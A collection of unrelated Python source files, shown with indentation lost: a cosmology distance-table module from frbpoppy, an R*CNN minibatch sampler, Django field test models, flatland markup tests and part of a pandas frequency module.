'wm', cvt(self.W_m),
'wv', cvt(self.W_v)]
f = '-'.join(paras)
self.file_name = uni_mods + f'{f}.db'
if self.test:
self.file_name = uni_mods + 'cosmo_test.db'
def create_table(self):
"""Create a lookup table for distances."""
m = ['Creating a distance table',
' - Only needs to happen once',
' - May take up to 2m on a single core']
for n in m:
pprint(n)
# Connect to database
conn = sqlite3.connect(self.file_name)
c = conn.cursor()
H_0 = self.H_0
W_m = self.W_m
W_v = self.W_v
W_k = 1.0 - W_m - W_v # Omega curvature
if W_k != 0.0:
pprint('Careful - Your cosmological parameters do not sum to 1.0')
zs = np.arange(0, self.z_max+self.step, self.step)
# Create database
t = 'real'
par = f'(z {t}, dist {t}, vol {t}, dvol {t}, cdf_sfr {t}, cdf_smd {t})'
s = f'create table distances {par}'
c.execute(s)
results = []
pprint(' - Calculating parameters at various redshifts')
conv = go.Redshift(zs, H_0=H_0, W_m=W_m, W_v=W_v)
dists = conv.dist_co()
vols = conv.vol_co()
# Get dV
dvols = np.zeros_like(vols)
dvols[1:] = np.diff(vols)
pprint(' - Calculating Star Formation Rate')
# Get pdf sfr
pdf_sfr = sfr(zs)*dvols
cdf_sfr = np.cumsum(pdf_sfr) # Unnormalized
cdf_sfr /= cdf_sfr[-1]
pprint(' - Calculating Stellar Mass Density')
# Get pdf csmd
pdf_smd = smd(zs, H_0=H_0, W_m=W_m, W_v=W_v)*dvols
cdf_smd = np.cumsum(pdf_smd) # Unnormalized
cdf_smd /= cdf_smd[-1]
results = np.stack((zs, dists, vols, dvols, cdf_sfr, cdf_smd)).T
pprint(' - Saving values to database')
# Save results to database
data = map(tuple, results.tolist())
c.executemany('insert into distances values (?,?,?,?,?,?)', data)
# Make for easier searching
# I don't really understand SQL index names...
c.execute('create index ix on distances (z)')
c.execute('create index ixx on distances (dist)')
c.execute('create index ixxx on distances (vol)')
c.execute('create index ixxxx on distances (dvol)')
c.execute('create index ixxxxx on distances (cdf_sfr)')
c.execute('create index ixxxxxx on distances (cdf_smd)')
# Save
conn.commit()
pprint('Finished distance table')
def lookup(self, z=None, dist_co=None, vol_co=None, dvol_co=None,
cdf_sfr=None, cdf_smd=None):
"""Look up associated values with input values."""
# Connect to database
conn = sqlite3.connect(self.file_name)
c = conn.cursor()
# Check what's being looked up, set all other keywords to same length
kw = {'z': z,
'dist': dist_co,
'vol': vol_co,
'dvol': dvol_co,
'cdf_sfr': cdf_sfr,
'cdf_smd': cdf_smd}
for key, value in kw.items():
if value is not None:
in_par = key
break
for key, value in kw.items():
if key != in_par:
kw[key] = np.ones_like(kw[in_par])
keys = list(kw.keys())
# Search database
query = f'select * from distances where {in_par} > ? limit 1'
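        # Rows were inserted in order of increasing z, and z, dist, vol,
        # cdf_sfr and cdf_smd all grow monotonically with z, so the first row
        # exceeding the requested value is the nearest entry above it.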
for i, r in enumerate(kw[in_par]):
d = c.execute(query, [str(r)]).fetchone()
for ii, key in enumerate(keys):
if key == in_par:
continue
kw[key][i] = d[ii]
# Close database
conn.close()
return list(kw.values())
def sfr(z):
"""Return the number density of star forming rate at redshift z.
Follows Madau & Dickinson (2014), eq. 15. For more info see
https://arxiv.org/pdf/1403.0007.pdf
"""
return (1+z)**2.7/(1+((1+z)/2.9)**5.6)
def smd(z, H_0=67.74, W_m=0.3089, W_v=0.6911):
"""Return the number density of Stellar Mass Density at redshift z.
Follows Madau & Dickinson (2014), eq. 2 & 15. For more info see
https://arxiv.org/pdf/1403.0007.pdf
"""
def integral(z):
z1 = z + 1
return z1**1.7/(1+(z1/2.9)**5.6)*(1/(H_0*(W_m*z1**3+W_v)**0.5))
def csmd(z):
return 0.01095*quad(integral, z, np.inf)[0]
vec_csmd = np.vectorize(csmd)
return vec_csmd(z)
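# Hedged sketch (not part of frbpoppy): the comoving distance underlying the
# lookup table follows Hogg (1999), D_C = (c/H_0) * int_0^z dz'/E(z') with
# E(z) = sqrt(W_m*(1+z)^3 + W_k*(1+z)^2 + W_v). Shown here only to make the
# integral explicit; the module itself delegates these calculations to
# go.Redshift.
if __name__ == '__main__':
    c_km_s = 299792.458  # speed of light [km/s]
    H_0, W_m, W_v = 67.74, 0.3089, 0.6911  # flat universe assumed, W_k = 0
    def _e(z):
        return np.sqrt(W_m * (1 + z)**3 + W_v)
    d_c = c_km_s / H_0 * quad(lambda z: 1 / _e(z), 0, 1.0)[0]  # [Mpc]
    print(f'Comoving distance to z=1: ~{d_c / 1e3:.2f} Gpc')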
|
|
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
# --------------------------------------------------------
# R*CNN
# Written by Georgia Gkioxari, 2015.
# See LICENSE in the project root for license information.
# --------------------------------------------------------
"""Compute minibatch blobs for training a Fast R*CNN network."""
import numpy as np
import numpy.random as npr
import cv2
from fast_rcnn.config import cfg
from utils.blob import prep_im_for_blob, im_list_to_blob
import utils.cython_bbox
def get_minibatch(roidb, num_classes):
"""Given a roidb, construct a minibatch sampled from it."""
num_images = len(roidb)
# Sample random scales to use for each image in this batch
random_scale_inds = npr.randint(0, high=len(cfg.TRAIN.SCALES),
size=num_images)
assert(cfg.TRAIN.BATCH_SIZE % num_images == 0), \
'num_images ({}) must divide BATCH_SIZE ({})'. \
format(num_images, cfg.TRAIN.BATCH_SIZE)
rois_per_image = cfg.TRAIN.BATCH_SIZE / num_images
fg_rois_per_image = np.round(cfg.TRAIN.FG_FRACTION * rois_per_image)
# Get the input image blob, formatted for caffe
im_blob, im_scales = _get_image_blob(roidb, random_scale_inds)
# Now, build the region of interest and label blobs
rois_blob = np.zeros((0, 5), dtype=np.float32)
secondary_rois_blob = np.zeros((0, 5), dtype = np.float32)
labels_blob = np.zeros((0), dtype=np.float32)
bbox_targets_blob = np.zeros((0, 4 * num_classes), dtype=np.float32)
bbox_loss_blob = np.zeros(bbox_targets_blob.shape, dtype=np.float32)
# all_overlaps = []
for im_i in xrange(num_images):
labels, overlaps, im_rois, sec_rois, bbox_targets, bbox_loss \
= _sample_rois(roidb[im_i], fg_rois_per_image, rois_per_image,
num_classes)
# Add to RoIs blob
rois = _project_im_rois(im_rois, im_scales[im_i])
batch_ind = im_i * np.ones((rois.shape[0], 1))
rois_blob_this_image = np.hstack((batch_ind, rois))
rois_blob = np.vstack((rois_blob, rois_blob_this_image))
# Add to Secondary RoIs blob
secondary_rois = _project_im_rois(sec_rois, im_scales[im_i])
secondary_batch_ind = im_i * np.ones((secondary_rois.shape[0], 1))
secondary_blob_this_image = np.hstack((secondary_batch_ind, secondary_rois))
secondary_rois_blob = np.vstack((secondary_rois_blob, secondary_blob_this_image))
# Add to labels, bbox targets, and bbox loss blobs
labels_blob = np.hstack((labels_blob, labels))
bbox_targets_blob = np.vstack((bbox_targets_blob, bbox_targets))
bbox_loss_blob = np.vstack((bbox_loss_blob, bbox_loss))
# all_overlaps = np.hstack((all_overlaps, overlaps))
# Size checks
assert(secondary_rois_blob.shape[0]==cfg.TRAIN.CONTEXT_NUM_ROIS*rois_blob.shape[0]),"Context and ROIs don't match"
assert(labels_blob.shape[0]==rois_blob.shape[0]),"Labels and ROIs don't match"
assert(bbox_targets_blob.shape[0]==rois_blob.shape[0])
assert(bbox_loss_blob.shape[0]==rois_blob.shape[0])
# For debug visualizations
# _vis_minibatch(im_blob, rois_blob, secondary_rois_blob, labels_blob)
blobs = {'data': im_blob,
'rois': rois_blob,
'secondary_rois': secondary_rois_blob,
'labels': labels_blob}
if cfg.TRAIN.BBOX_REG:
blobs['bbox_targets'] = bbox_targets_blob
blobs['bbox_loss_weights'] = bbox_loss_blob
return blobs
def _sample_rois(roidb, fg_rois_per_image, rois_per_image, num_classes):
"""Generate a random sample of RoIs comprising foreground and background
examples.
"""
# label = class RoI has max overlap with
labels = roidb['max_classes']
overlaps = roidb['max_overlaps']
rois = roidb['boxes']
secondary_rois = roidb['boxes']
# overlaps of boxes
boxes_overlaps = \
utils.cython_bbox.bbox_overlaps(rois.astype(np.float), rois.astype(np.float))
# Select foreground ROIs as those with >= FG_THRESH overlap
fg_inds = np.where(overlaps >= cfg.TRAIN.FG_THRESH)[0]
# Guard against the case when an image has fewer than fg_rois_per_image
# foreground ROIs
fg_rois_per_this_image = np.minimum(fg_rois_per_image, fg_inds.size)
# Sample foreground regions without replacement
if fg_inds.size > 0:
fg_inds = npr.choice(fg_inds, size=fg_rois_per_this_image,
replace=False)
# Select secondary ROIs for fg regions
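    # For each foreground RoI, R*CNN also samples CONTEXT_NUM_ROIS "secondary"
    # (context) regions whose overlap with that RoI lies in
    # [TRAIN.IOU_LB, TRAIN.IOU_UB]; if fewer candidates exist they are sampled
    # with replacement, and a foreground RoI with no candidates is dropped.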
valid_fg = np.zeros(fg_inds.shape[0], dtype=bool)
secondary_fg = np.zeros((0), dtype=np.int64)
for i,fg_i in enumerate(fg_inds):
cinds = np.where((boxes_overlaps[:,fg_i] >= cfg.TRAIN.IOU_LB) &
(boxes_overlaps[:,fg_i] <= cfg.TRAIN.IOU_UB))[0]
if cinds.size > cfg.TRAIN.CONTEXT_NUM_ROIS:
cinds = npr.choice(cinds, size = cfg.TRAIN.CONTEXT_NUM_ROIS,
replace=False)
elif cinds.size > 0:
cinds = npr.choice(cinds, size = cfg.TRAIN.CONTEXT_NUM_ROIS,
replace=True)
if cinds.size > 0:
assert(cinds.size == cfg.TRAIN.CONTEXT_NUM_ROIS),"Secondary RoIs are not of correct size"
valid_fg[i] = 1
secondary_fg = np.concatenate((secondary_fg, cinds),axis=0)
# # DEBUGGING
# print "Image " + format(roidb['image'])
# print "Box index {:d} - Label {:d}".format(fg_i, labels[fg_i])
# print "Coords: {:d} {:d} {:d} {:d}".format(rois[fg_i,0],rois[fg_i,1],rois[fg_i,2],rois[fg_i,3])
# for j in xrange(cinds.size):
# print "Context Coords: {:d} {:d} {:d} {:d}" \
# .format(rois[cinds[j],0],rois[cinds[j],1],
# rois[cinds[j],2],rois[cinds[j],3])
fg_inds = fg_inds[valid_fg]
fg_rois_per_this_image = fg_inds.size
assert(fg_inds.size*cfg.TRAIN.CONTEXT_NUM_ROIS == secondary_fg.size),"[FG all] Does not match"
# The indices that we're selecting (both fg and bg)
keep_inds = fg_inds
keep_secondary_inds = secondary_fg
# Select sampled values from various arrays:
labels = labels[keep_inds]
overlaps = overlaps[keep_inds]
rois = rois[keep_inds]
secondary_rois = secondary_rois[keep_secondary_inds]
bbox_targets, bbox_loss_weights = \
_get_bbox_regression_labels(roidb['bbox_targets'][keep_inds, :],
num_classes)
return labels, overlaps, rois, secondary_rois, bbox_targets, bbox_loss_weights
def _get_image_blob(roidb, scale_inds):
"""Builds an input blob from the images in the roidb at the specified
scales.
"""
num_images = len(roidb)
processed_ims = []
im_scales = []
for i in xrange(num_images):
im = cv2.imread(roidb[i]['image'])
if roidb[i]['flipped']:
im = im[:, ::-1, :]
target_size = cfg.TRAIN.SCALES[scale_inds[i]]
im, im_scale = prep_im_for_blob(im, cfg.PIXEL_MEANS, target_size,
cfg.TRAIN.MAX_SIZE)
im_scales.append(im_scale)
processed_ims.append(im)
# Create a blob to hold the input images
blob = im_list_to_blob(processed_ims)
return blob, im_scales
def _project_im_rois(im_rois, im_scale_factor):
"""Project image RoIs into the rescaled training image."""
rois = im_rois * im_scale_factor
return rois
def _get_bbox_regression_labels(bbox_target_data, num_classes):
"""Bounding-box regression targets are stored in a compact form in the
roidb.
This function expands those targets into the 4-of-4*K representation used
by the network (i.e. only one class has non-zero targets). The loss weights
are similarly expanded.
Returns:
        bbox_targets (ndarray): N x 4K blob of regression targets
bbox_loss_weights (ndarray): N x 4K blob of loss weights
"""
clss = bbox_target_data[:, 0]
bbox_targets = np.zeros((clss.size, 4 * num_classes), dtype=np.float32)
bbox_loss_weights = np.zeros(bbox_targets.shape, dtype=np.float32)
inds = np.where(clss >= 0)[0]
for ind in inds:
cls = clss[ind]
start = 4 * cls
end = start + 4
bbox_targets[ind, start:end] = bbox_target_data[ind, 1:]
bbox_loss_weights[ind, start:end] = [1., 1., 1., 1.]
return bbox_targets, bbox_loss_weights
def _vis_minibatch(im_blob, rois_blob, secondary_rois_blob, labels_blob):
"""Visualize a mini-batch for debugging."""
import matplotlib.pyplot as plt
for i in xrange(rois_blob.shape[0]):
rois = rois_blob[i, :]
sec_rois = secondary_rois_blob[i*cfg.TRAIN.CONTEXT_NUM_ROIS:(i+1)*cfg.TRAIN.CONTEXT_NUM_ROIS,:]
im_ind = rois[0]
assert all(sec_rois[:,0]==im_ind)
roi = rois[1:]
im = im_blob[im_ind, :, :, :].transpose((1, 2, 0)).copy()
im += cfg.PIXEL_MEANS
im = im[:, :, (2, 1, 0)]
im = im.astype(np.uint8)
cls = labels_blob[i]
plt.imshow(im)
print 'class: ', cls
plt.gca().add_patch(
plt.Rectangle((roi[0], roi[1]), roi[2] - roi[0],
roi[3] - roi[1], fill=False,
edgecolor='r', linewidth=3)
)
for sec_i in xrange(sec_rois.shape[0]):
plt.gca().add_patch(
plt.Rectangle((sec_rois[sec_i,1], sec_rois[sec_i,2]),
sec_rois[sec_i,3] - sec_rois[sec_i,1],
sec_rois[sec_i,4] - sec_rois[sec_i,2], fill=False,
edgecolor='g', linewidth=3)
)
plt.show()
|
|
import os
import tempfile
import uuid
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.db.models.fields.files import ImageField, ImageFieldFile
from django.db.models.fields.related import (
ForeignKey, ForeignObject, ManyToManyField, OneToOneField,
)
from django.utils import six
try:
from PIL import Image
except ImportError:
Image = None
class Foo(models.Model):
a = models.CharField(max_length=10)
d = models.DecimalField(max_digits=5, decimal_places=3)
def get_foo():
return Foo.objects.get(id=1)
class Bar(models.Model):
b = models.CharField(max_length=10)
a = models.ForeignKey(Foo, default=get_foo, related_name=b'bars')
class Whiz(models.Model):
CHOICES = (
('Group 1', (
(1, 'First'),
(2, 'Second'),
)
),
('Group 2', (
(3, 'Third'),
(4, 'Fourth'),
)
),
(0, 'Other'),
)
c = models.IntegerField(choices=CHOICES, null=True)
class Counter(six.Iterator):
def __init__(self):
self.n = 1
def __iter__(self):
return self
def __next__(self):
if self.n > 5:
raise StopIteration
else:
self.n += 1
return (self.n, 'val-' + str(self.n))
class WhizIter(models.Model):
c = models.IntegerField(choices=Counter(), null=True)
class WhizIterEmpty(models.Model):
c = models.CharField(choices=(x for x in []), blank=True, max_length=1)
class BigD(models.Model):
d = models.DecimalField(max_digits=38, decimal_places=30)
class FloatModel(models.Model):
size = models.FloatField()
class BigS(models.Model):
s = models.SlugField(max_length=255)
class SmallIntegerModel(models.Model):
value = models.SmallIntegerField()
class IntegerModel(models.Model):
value = models.IntegerField()
class BigIntegerModel(models.Model):
value = models.BigIntegerField()
null_value = models.BigIntegerField(null=True, blank=True)
class PositiveSmallIntegerModel(models.Model):
value = models.PositiveSmallIntegerField()
class PositiveIntegerModel(models.Model):
value = models.PositiveIntegerField()
class Post(models.Model):
title = models.CharField(max_length=100)
body = models.TextField()
class NullBooleanModel(models.Model):
nbfield = models.NullBooleanField()
class BooleanModel(models.Model):
bfield = models.BooleanField(default=None)
string = models.CharField(max_length=10, default='abc')
class DateTimeModel(models.Model):
d = models.DateField()
dt = models.DateTimeField()
t = models.TimeField()
class DurationModel(models.Model):
field = models.DurationField()
class NullDurationModel(models.Model):
field = models.DurationField(null=True)
class PrimaryKeyCharModel(models.Model):
string = models.CharField(max_length=10, primary_key=True)
class FksToBooleans(models.Model):
"""Model with FKs to models with {Null,}BooleanField's, #15040"""
bf = models.ForeignKey(BooleanModel)
nbf = models.ForeignKey(NullBooleanModel)
class FkToChar(models.Model):
"""Model with FK to a model with a CharField primary key, #19299"""
out = models.ForeignKey(PrimaryKeyCharModel)
class RenamedField(models.Model):
modelname = models.IntegerField(name="fieldname", choices=((1, 'One'),))
class VerboseNameField(models.Model):
id = models.AutoField("verbose pk", primary_key=True)
field1 = models.BigIntegerField("verbose field1")
field2 = models.BooleanField("verbose field2", default=False)
field3 = models.CharField("verbose field3", max_length=10)
field4 = models.CommaSeparatedIntegerField("verbose field4", max_length=99)
field5 = models.DateField("verbose field5")
field6 = models.DateTimeField("verbose field6")
field7 = models.DecimalField("verbose field7", max_digits=6, decimal_places=1)
field8 = models.EmailField("verbose field8")
field9 = models.FileField("verbose field9", upload_to="unused")
field10 = models.FilePathField("verbose field10")
field11 = models.FloatField("verbose field11")
# Don't want to depend on Pillow in this test
# field_image = models.ImageField("verbose field")
field12 = models.IntegerField("verbose field12")
field13 = models.IPAddressField("verbose field13")
field14 = models.GenericIPAddressField("verbose field14", protocol="ipv4")
field15 = models.NullBooleanField("verbose field15")
field16 = models.PositiveIntegerField("verbose field16")
field17 = models.PositiveSmallIntegerField("verbose field17")
field18 = models.SlugField("verbose field18")
field19 = models.SmallIntegerField("verbose field19")
field20 = models.TextField("verbose field20")
field21 = models.TimeField("verbose field21")
field22 = models.URLField("verbose field22")
field23 = models.UUIDField("verbose field23")
field24 = models.DurationField("verbose field24")
class GenericIPAddress(models.Model):
ip = models.GenericIPAddressField(null=True, protocol='ipv4')
###############################################################################
# These models aren't used in any test, just here to ensure they validate
# successfully.
# See ticket #16570.
class DecimalLessThanOne(models.Model):
d = models.DecimalField(max_digits=3, decimal_places=3)
# See ticket #18389.
class FieldClassAttributeModel(models.Model):
field_class = models.CharField
###############################################################################
class DataModel(models.Model):
short_data = models.BinaryField(max_length=10, default=b'\x08')
data = models.BinaryField()
###############################################################################
# FileField
class Document(models.Model):
myfile = models.FileField(upload_to='unused')
###############################################################################
# ImageField
# If Pillow available, do these tests.
if Image:
class TestImageFieldFile(ImageFieldFile):
"""
Custom Field File class that records whether or not the underlying file
was opened.
"""
def __init__(self, *args, **kwargs):
self.was_opened = False
super(TestImageFieldFile, self).__init__(*args, **kwargs)
def open(self):
self.was_opened = True
super(TestImageFieldFile, self).open()
class TestImageField(ImageField):
attr_class = TestImageFieldFile
# Set up a temp directory for file storage.
temp_storage_dir = tempfile.mkdtemp()
temp_storage = FileSystemStorage(temp_storage_dir)
temp_upload_to_dir = os.path.join(temp_storage.location, 'tests')
class Person(models.Model):
"""
Model that defines an ImageField with no dimension fields.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests')
class AbstractPersonWithHeight(models.Model):
"""
Abstract model that defines an ImageField with only one dimension field
to make sure the dimension update is correctly run on concrete subclass
instance post-initialization.
"""
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height')
mugshot_height = models.PositiveSmallIntegerField()
class Meta:
abstract = True
class PersonWithHeight(AbstractPersonWithHeight):
"""
    Concrete model that subclasses an abstract one with only one dimension
field.
"""
name = models.CharField(max_length=50)
class PersonWithHeightAndWidth(models.Model):
"""
Model that defines height and width fields after the ImageField.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
class PersonDimensionsFirst(models.Model):
"""
Model that defines height and width fields before the ImageField.
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
class PersonTwoImages(models.Model):
"""
Model that:
* Defines two ImageFields
* Defines the height/width fields before the ImageFields
* Has a nullable ImageField
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
headshot_height = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot_width = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot = TestImageField(blank=True, null=True,
storage=temp_storage, upload_to='tests',
height_field='headshot_height',
width_field='headshot_width')
class AllFieldsModel(models.Model):
big_integer = models.BigIntegerField()
binary = models.BinaryField()
boolean = models.BooleanField(default=False)
char = models.CharField(max_length=10)
csv = models.CommaSeparatedIntegerField(max_length=10)
date = models.DateField()
datetime = models.DateTimeField()
decimal = models.DecimalField(decimal_places=2, max_digits=2)
duration = models.DurationField()
email = models.EmailField()
file_path = models.FilePathField()
floatf = models.FloatField()
integer = models.IntegerField()
ip_address = models.IPAddressField()
generic_ip = models.GenericIPAddressField()
null_boolean = models.NullBooleanField()
positive_integer = models.PositiveIntegerField()
positive_small_integer = models.PositiveSmallIntegerField()
slug = models.SlugField()
small_integer = models.SmallIntegerField()
text = models.TextField()
time = models.TimeField()
url = models.URLField()
uuid = models.UUIDField()
fo = ForeignObject(
'self',
from_fields=['abstract_non_concrete_id'],
to_fields=['id'],
related_name='reverse'
)
fk = ForeignKey(
'self',
related_name='reverse2'
)
m2m = ManyToManyField('self')
oto = OneToOneField('self')
object_id = models.PositiveIntegerField()
content_type = models.ForeignKey(ContentType)
gfk = GenericForeignKey()
gr = GenericRelation(DataModel)
###############################################################################
class UUIDModel(models.Model):
field = models.UUIDField()
class NullableUUIDModel(models.Model):
field = models.UUIDField(blank=True, null=True)
class PrimaryKeyUUIDModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
class RelatedToUUIDModel(models.Model):
uuid_fk = models.ForeignKey('PrimaryKeyUUIDModel')
class UUIDChild(PrimaryKeyUUIDModel):
pass
class UUIDGrandchild(UUIDChild):
pass
|
|
from flatland import String
from tests._util import fails
from tests.markup._util import desired_output
schema = String.named(u'element').using(default=u'val').from_defaults
### value
@desired_output('html', schema)
def value_bound():
"""<div value="val"></div>"""
@value_bound.genshi_06
def test_value_bound_genshi_06():
"""<div form:bind="form" form:auto-value="on" />"""
@value_bound.genshi_05
def test_value_bound_genshi_05():
"""<div form:bind="form" form:auto-value="on" />"""
@value_bound.markup
def test_value_bound_markup(gen, el):
return gen.tag('div', el, auto_value=True)
@desired_output('html', None)
def value_unbound():
"""<div></div>"""
@value_unbound.genshi_06
def test_value_unbound_genshi_06():
"""<div form:auto-value="on" />"""
@value_unbound.genshi_05
def test_value_unbound_genshi_05():
"""<div form:auto-value="on" />"""
@value_unbound.markup
def test_value_unbound_markup(gen, el):
return gen.tag('div', auto_value=True)
### name
@desired_output('html', schema)
def name_bound():
"""<div name="element"></div>"""
@name_bound.genshi_06
def test_name_bound_genshi_06():
"""<div form:bind="form" form:auto-name="on" />"""
@name_bound.genshi_05
def test_name_bound_genshi_05():
"""<div form:bind="form" form:auto-name="on" />"""
@name_bound.markup
def test_name_bound_markup(gen, el):
return gen.tag('div', el, auto_name=True)
@desired_output('html', None)
def name_unbound():
"""<div></div>"""
@name_unbound.genshi_06
def test_name_unbound_genshi_06():
"""<div form:auto-name="on" />"""
@name_unbound.genshi_05
def test_name_unbound_genshi_05():
"""<div form:auto-name="on" />"""
@name_unbound.markup
def test_name_unbound_markup(gen, el):
return gen.tag('div', auto_name=True)
### domid
@desired_output('html', schema)
def domid_bound():
"""<div id="f_element"></div>"""
@domid_bound.genshi_06
def test_domid_bound_genshi_06():
"""<div form:bind="form" form:auto-domid="on" />"""
@domid_bound.genshi_05
def test_domid_bound_genshi_05():
"""<div form:bind="form" form:auto-domid="on" />"""
@domid_bound.markup
def test_domid_bound_markup(gen, el):
return gen.tag('div', el, auto_domid=True)
@desired_output('html', None)
def domid_unbound():
"""<div></div>"""
@domid_unbound.genshi_06
def test_domid_unbound_genshi_06():
"""<div form:auto-domid="on" />"""
@fails('<div id="None"></div>')
@domid_unbound.genshi_05
def test_domid_unbound_genshi_05():
"""<div form:auto-domid="on" />"""
@domid_unbound.markup
def test_domid_unbound_markup(gen, el):
return gen.tag('div', auto_domid=True)
### for
@desired_output('html', schema)
def for_bound():
"""<div for="f_element"></div>"""
@for_bound.genshi_06
def test_for_bound_genshi_06():
"""<div form:bind="form" form:auto-for="on" />"""
@for_bound.genshi_05
def test_for_bound_genshi_05():
"""<div form:bind="form" form:auto-for="on" />"""
@for_bound.markup
def test_for_bound_markup(gen, el):
return gen.tag('div', el, auto_for=True)
@desired_output('html', None)
def for_unbound():
"""<div></div>"""
@for_unbound.genshi_06
def test_for_unbound_genshi_06():
"""<div form:auto-for="on" />"""
@for_unbound.genshi_05
def test_for_unbound_genshi_05():
"""<div form:auto-for="on" />"""
@for_unbound.markup
def test_for_unbound_markup(gen, el):
return gen.tag('div', auto_for=True)
### tabindex
@desired_output('html', schema)
def tabindex_bound():
"""<div tabindex="1"></div>"""
@tabindex_bound.genshi_06
def test_tabindex_bound_genshi_06():
"""
<form:set tabindex="1"/>
<div form:bind="form" form:auto-tabindex="on" />
"""
@tabindex_bound.genshi_05
def test_tabindex_bound_genshi_05():
"""
<form:set tabindex="1"/>
<div form:bind="form" form:auto-tabindex="on" />
"""
@tabindex_bound.markup
def test_tabindex_bound_markup(gen, el):
gen.set(tabindex=1)
return gen.tag('div', el, auto_tabindex=True)
@desired_output('html', None)
def tabindex_unbound():
"""<div tabindex="1"></div>"""
@tabindex_unbound.genshi_06
def test_tabindex_unbound_genshi_06():
"""
<form:set tabindex="1"/>
<div form:auto-tabindex="on" />
"""
@tabindex_unbound.genshi_05
def test_tabindex_unbound_genshi_05():
"""
<form:set tabindex="1"/>
<div form:auto-tabindex="on" />
"""
@tabindex_unbound.markup
def test_tabindex_unbound_markup(gen, el):
gen.set(tabindex=1)
return gen.tag('div', auto_tabindex=True)
### combo
@desired_output('html', schema)
def combo_unbound():
"""<div tabindex="1"></div>"""
@combo_unbound.genshi_06
def test_combo_unbound_genshi_06():
"""
<form:set tabindex="1"/>
<div form:auto-tabindex="on" form:auto-domid="on" />
"""
@fails('<div tabindex="1" id="None"></div>')
@combo_unbound.genshi_05
def test_combo_unbound_genshi_05():
"""
<form:set tabindex="1"/>
<div form:auto-tabindex="on" form:auto-domid="on" />
"""
@combo_unbound.markup
def test_combo_unbound_markup(gen, el):
gen.set(tabindex=1)
return gen.tag('div', auto_tabindex=True, auto_domid=True)
|
|
from datetime import datetime
from pandas.compat import range, long, zip
from pandas import compat
import re
import numpy as np
from pandas.core.algorithms import unique
from pandas.tseries.offsets import DateOffset
from pandas.util.decorators import cache_readonly
import pandas.tseries.offsets as offsets
import pandas.core.common as com
import pandas.lib as lib
import pandas.tslib as tslib
class FreqGroup(object):
FR_ANN = 1000
FR_QTR = 2000
FR_MTH = 3000
FR_WK = 4000
FR_BUS = 5000
FR_DAY = 6000
FR_HR = 7000
FR_MIN = 8000
FR_SEC = 9000
FR_MS = 10000
FR_US = 11000
FR_NS = 12000
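# Frequency codes are grouped in blocks of 1000 (annual=1000 ... nanosecond=12000);
# get_freq_group() below floors a code to the start of its block.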
class Resolution(object):
RESO_US = tslib.US_RESO
RESO_MS = tslib.MS_RESO
RESO_SEC = tslib.S_RESO
RESO_MIN = tslib.T_RESO
RESO_HR = tslib.H_RESO
RESO_DAY = tslib.D_RESO
_reso_str_map = {
RESO_US: 'microsecond',
RESO_MS: 'millisecond',
RESO_SEC: 'second',
RESO_MIN: 'minute',
RESO_HR: 'hour',
RESO_DAY: 'day'}
_str_reso_map = dict([(v, k) for k, v in compat.iteritems(_reso_str_map)])
_reso_freq_map = {
'year': 'A',
'quarter': 'Q',
'month': 'M',
'day': 'D',
'hour': 'H',
'minute': 'T',
'second': 'S',
'millisecond': 'L',
'microsecond': 'U',
'nanosecond': 'N'}
_freq_reso_map = dict([(v, k) for k, v in compat.iteritems(_reso_freq_map)])
@classmethod
def get_str(cls, reso):
return cls._reso_str_map.get(reso, 'day')
@classmethod
def get_reso(cls, resostr):
return cls._str_reso_map.get(resostr, cls.RESO_DAY)
@classmethod
def get_freq(cls, resostr):
return cls._reso_freq_map[resostr]
@classmethod
def get_str_from_freq(cls, freq):
return cls._freq_reso_map.get(freq, 'day')
@classmethod
def get_reso_from_freq(cls, freq):
return cls.get_reso(cls.get_str_from_freq(freq))
def get_reso_string(reso):
return Resolution.get_str(reso)
def get_to_timestamp_base(base):
if base < FreqGroup.FR_BUS:
return FreqGroup.FR_DAY
if FreqGroup.FR_HR <= base <= FreqGroup.FR_SEC:
return FreqGroup.FR_SEC
return base
def get_freq_group(freq):
if isinstance(freq, compat.string_types):
base, mult = get_freq_code(freq)
freq = base
return (freq // 1000) * 1000
def get_freq(freq):
if isinstance(freq, compat.string_types):
base, mult = get_freq_code(freq)
freq = base
return freq
def get_freq_code(freqstr):
"""
Parameters
----------
Returns
-------
"""
if isinstance(freqstr, DateOffset):
freqstr = (get_offset_name(freqstr), freqstr.n)
if isinstance(freqstr, tuple):
if (com.is_integer(freqstr[0]) and
com.is_integer(freqstr[1])):
# e.g., freqstr = (2000, 1)
return freqstr
else:
# e.g., freqstr = ('T', 5)
try:
code = _period_str_to_code(freqstr[0])
stride = freqstr[1]
except:
if com.is_integer(freqstr[1]):
raise
code = _period_str_to_code(freqstr[1])
stride = freqstr[0]
return code, stride
if com.is_integer(freqstr):
return (freqstr, 1)
base, stride = _base_and_stride(freqstr)
code = _period_str_to_code(base)
return code, stride
def _get_freq_str(base, mult=1):
code = _reverse_period_code_map.get(base)
if mult == 1:
return code
return str(mult) + code
#----------------------------------------------------------------------
# Offset names ("time rules") and related functions
from pandas.tseries.offsets import (Nano, Micro, Milli, Second, Minute, Hour,
Day, BDay, CDay, Week, MonthBegin,
MonthEnd, BMonthBegin, BMonthEnd,
QuarterBegin, QuarterEnd, BQuarterBegin,
BQuarterEnd, YearBegin, YearEnd,
BYearBegin, BYearEnd, _make_offset
)
try:
cday = CDay()
except NotImplementedError:
cday = None
